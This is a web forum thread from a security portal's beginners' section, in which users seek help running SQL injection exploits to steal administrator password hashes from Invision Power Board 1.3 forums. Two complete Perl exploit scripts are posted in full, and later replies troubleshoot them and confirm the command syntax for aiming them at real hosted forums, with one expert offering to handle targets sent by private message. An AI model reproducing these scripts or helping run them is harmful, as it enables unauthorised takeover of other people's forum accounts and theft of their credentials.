Waraxe IT Security Portal
Login or Register
November 6, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 63
Members: 0
Total: 63
Full disclosure
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
APPLE-SA-10-28-2024-3 macOS Sequoia 15.1
APPLE-SA-10-28-2024-2 iOS 17.7.1 and iPadOS 17.7.1
APPLE-SA-10-28-2024-1 iOS 18.1 and iPadOS 18.1
Open Redirect / Reflected XSS - booked-schedulerv2.8.5
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> IPB exploit hash help. Goto page 1, 2Next
Post new topicReply to topic View previous topic :: View next topic
IPB exploit hash help.
PostPosted: Fri Dec 28, 2007 4:30 pm Reply with quote
Sarkos
Beginner
Beginner
Joined: Dec 28, 2007
Posts: 1




Hello there.
For the past few hours I've been trying to retrieve an Admin's password from a IPB forum.
It's ver. 1.3Final
I've been using this code:
Code:
#!/usr/bin/perl -w
##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "Tony Little Lately" and "Petey Beege"
##################################################################

use LWP::UserAgent;

$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])
{
print "The type of the file system is NTFS.\n\n";
print "WARNING, ALL DATA ON NON-REMOVABLE DISK\n";
print "DRIVE C: WILL BE LOST!\n";
print "Proceed with Format (Y/N)?\n";
exit;
}

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';

for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);

# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '<title>(.*)Log In(.*)</title>';

$_ = $res->content;

if ($dbug) { print };

if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current\n";
last;
}

}
if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;

# milw0rm.com [2005-05-26]


However, when I set it up;
Code:
C:\Perl\Bin>Hack.pl http://z1.invisionfree.com/forums/************/ 222 1

I always receive the hash as 0's
I've tried multiple users but they all come up as 0's

Got any ideas on what the problem is and how to fix it?

Thanks.

EDIT: I've used numerous other codes as well, but I won't list them unless requested, since most of them show errors.
View user's profile Send private message
PostPosted: Fri Dec 28, 2007 4:52 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Maybe target is patched? You know, whats's your best option? Get needed IPB version from somewhere and install in your home PC. And then try exploit(s) locally. And after you have been successful in hacking your own website(s), then try remote targets in real world. This can save you from lot's of frustration Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jan 09, 2008 8:20 am Reply with quote
lmaoqwerty
Regular user
Regular user
Joined: Jan 06, 2008
Posts: 11




Same problem I get too. Apparently, v1.3 final is not available for download any longer. If it is, could you please find the link for me waraxe?
View user's profile Send private message
PostPosted: Wed Jan 09, 2008 11:50 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




For IPB version 1.3 and 1.3.1 final




Code:
#!/usr/bin/perl

## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d

use IO::Socket;

if (@ARGV < 4) { &usage; }

$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];

$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]

MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr($char);
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh = "%20";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);

while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}

return 0;
}

sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}

sub usage()
{
print q(
Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]

[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute

targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)

e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------

);
exit();
}
View user's profile Send private message
PostPosted: Thu Jan 10, 2008 12:46 am Reply with quote
lmaoqwerty
Regular user
Regular user
Joined: Jan 06, 2008
Posts: 11




Koko, that's the exploit I have been using, and if you had actually read what waraxe said, he was saying that we should download IPB v1.3 FORUM and install on our computer. But I said I cannot find it and he should give me the link. Do you know where the link is?
View user's profile Send private message
PostPosted: Thu Jan 10, 2008 9:30 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Why test this script local if works a 100% of all IPB there i tested.
View user's profile Send private message
PostPosted: Fri Feb 15, 2008 9:26 am Reply with quote
Suteki
Beginner
Beginner
Joined: Feb 15, 2008
Posts: 1




koko wrote:
Why test this script local if works a 100% of all IPB there i tested.


I get the error "Can't use an undefined value as a symbol reference on line 129"

That line contains:

Code:
printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",


Any help?
View user's profile Send private message
PostPosted: Fri Feb 15, 2008 1:11 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Suteki send me URL in PM.
View user's profile Send private message
PostPosted: Fri Feb 15, 2008 7:40 pm Reply with quote
ggggg
Regular user
Regular user
Joined: Feb 15, 2008
Posts: 7




i would like some help also, i have tried not only that code but a few, each containing a new way to get the pass, but i can't seem to make them work.
i have perl, the comands are good (i think), the codes are similar to this one and i have used this one.
usually i put ipb.pl http\\:z7.inv....... \.........\ 1 0
no luck, i remove the space it gives an error at a line, i put space it does nothing.
i would like some help as i am tired of using exploits that i don't know if they work or not.
View user's profile Send private message
PostPosted: Fri Feb 15, 2008 9:10 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Remove http:// from url.
View user's profile Send private message
PostPosted: Fri Feb 15, 2008 9:29 pm Reply with quote
ggggg
Regular user
Regular user
Joined: Feb 15, 2008
Posts: 7




2 exploits show either a "can't connect" or "can't use an undefined value.........at line 134"

do you want the link so you can try? beleive me, i can't
View user's profile Send private message
PostPosted: Sat Feb 16, 2008 7:29 am Reply with quote
Vexer
Beginner
Beginner
Joined: Feb 16, 2008
Posts: 1




im using the code that you provided koko and i keep getting the same error over and over "Can't use an undefined value as a symbol reference on line 129" Any suggestions?
View user's profile Send private message
PostPosted: Thu Feb 21, 2008 10:10 am Reply with quote
James9r9r
Regular user
Regular user
Joined: Feb 21, 2008
Posts: 7
Location: hghdg




Here ya go

DOWNLOAD:

Edited to work with new mysql...


I don't know why there are all 0,0,0,0,0,0,0,0,0,0's I have the same problem, then on some forums that are v1.3 Final I actually get a hash. Maybe the ones that you just get all 0's are patched
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
PostPosted: Sun Mar 30, 2008 2:05 am Reply with quote
Translash
Beginner
Beginner
Joined: Mar 30, 2008
Posts: 2




OK so if lets say the site is z15.invisionfree.om/********/

Would the syntax be

[name of script].pl z.15.invisionfree.com /********/ 1 0

I dont know what they mean by folder where IPB is installed. This is for Koko's script, cuz I think it has the potential to work on IPB 1.3 final but I do not know how to harness it.
View user's profile Send private message
PostPosted: Sun Mar 30, 2008 7:57 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Code:
[name of script].pl z.15.invisionfree.com /********/ 1 0


Exactly.
View user's profile Send private message
IPB exploit hash help.
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 2
Goto page 1, 2Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.037 Seconds